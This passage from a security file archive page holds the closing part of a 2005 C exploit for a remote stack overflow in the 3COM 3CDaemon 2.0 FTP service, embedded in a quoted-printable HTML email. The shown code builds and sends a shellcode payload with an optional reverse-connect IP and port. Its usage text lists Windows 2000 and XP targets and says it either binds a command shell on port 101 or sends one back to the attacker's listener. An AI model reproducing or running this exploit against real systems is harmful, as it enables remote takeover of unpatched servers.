mp;scode1[5],=20
&gip, 4);<BR>&nbsp;&nbsp;&nbsp;&nbsp;memcpy(&scode1[3], =
&gport,=20
2);<BR>&nbsp;&nbsp;&nbsp;&nbsp;memcpy(payload+253,scode1,sizeof(scode1));=
<BR>&nbsp;&nbsp;&nbsp;}<BR>&nbsp;&nbsp;&nbsp;else=20
memcpy(payload+253,scode2,sizeof(scode2));<BR>&nbsp;&nbsp;&nbsp;strcat(pa=
yload,EOL);<BR>&nbsp;&nbsp;&nbsp;if=20
(send(s,payload,strlen(payload),0)=3D=3D-1) { printf("[+] sending error =
1, the=20
server prolly rebooted.\n");return -1;}<BR>#ifdef=20
WIN32<BR>&nbsp;&nbsp;&nbsp;Sleep(2000);<BR>#else<BR>&nbsp;&nbsp;&nbsp;Sle=
ep(2);<BR>#endif</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>&nbsp;&nbsp;&nbsp;printf("[+] size of =
payload:=20
%d\n",strlen(payload));<BR>&nbsp;&nbsp;&nbsp;printf("[+] payload=20
sent.\n");<BR>&nbsp;&nbsp;&nbsp;return=20
0;<BR>&nbsp;&nbsp;}<BR>&nbsp;}<BR>&nbsp;closesocket(s);<BR>#ifdef=20
WIN32<BR>&nbsp;WSACleanup();<BR>#endif<BR>&nbsp;return =
0;<BR>}</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2><BR>void usage(char*=20
us)<BR>{<BR>&nbsp;printf("USAGE:\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;=20
[+]&nbsp; . 101_3com.exe Target VulnIP (bind=20
mode)\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [+]&nbsp; .=20
101_3com.exe Target VulnIP VulnPORT (bind=20
mode)\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [+]&nbsp; .=20
101_3com.exe Target VulnIP VulnPORT GayIP GayPORT (reverse=20
mode)\n");<BR>&nbsp;printf("TARGET:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [+] 1. Win2k =
SP4&nbsp;=20
Server English (*)\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
[+] 1.=20
Win2k SP4&nbsp; Pro&nbsp;&nbsp;&nbsp; English=20
(*)\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [+] 1. Win2k =
SP4&nbsp;=20
Server German&nbsp; =
(*)\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [+]=20
1. Win2k SP4&nbsp; Pro&nbsp;&nbsp;&nbsp; China&nbsp;&nbsp;=20
(*)\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [+] 1. Win2k =
SP4&nbsp;=20
Pro&nbsp;&nbsp;&nbsp; Dutch&nbsp;&nbsp;=20
(*)\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [+] 1. Win2k =
SP4&nbsp;=20
Pro&nbsp;&nbsp;&nbsp; Norsk&nbsp;&nbsp;=20
(*)\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [+] 2. WinXP =
SP2&nbsp;=20
Pro.&nbsp;&nbsp; English&nbsp;&nbsp;&nbsp;=20
\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [+] 2. WinXP SP1a=20
Pro.&nbsp;&nbsp; English=20
(*)\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [+] 2. WinXP =
SP1&nbsp;=20
Pro.&nbsp;&nbsp; English&nbsp;&nbsp;&nbsp;=20
\n");<BR>&nbsp;printf("NOTE:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; The exploit bind a =

cmdshell port 101 =
or\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
reverse a cmdshell on your=20
listener.\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; A =
wildcard (*)=20
mean tested working, else, supposed=20
working.\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
Compilation msvc6,=20
cygwin, Linux.\n");<BR>&nbsp;return;<BR>}<BR>void=20
ver()<BR>{<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D[0.1]=3D=3D=3D=3D=3D\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;=20
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D3COM 3CDaemon v2.0 =
Revision=20
10=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\n");<BR>&nbsp;printf("&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3DFTP Service, Remote Stack=20
Overflow=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\n");<BR>&nbsp;printf("&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
=3D=3D=3D=3D=3D=3Dcoded by =
class101=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D[Hat-Squad.com=20
2005]=3D=3D=3D=3D=3D\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;=20
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;=20
\n");<BR>}<BR></FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial=20
size=3D2>-------------------------------------------------------------<BR=
>class101<BR>Jr.=20
Researcher<BR>Hat-Squad.com<BR>------------------------------------------=
-------------------</FONT></DIV></BODY></HTML>

------=_NextPart_000_0156_01C515DB.5BC9CC60--

Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close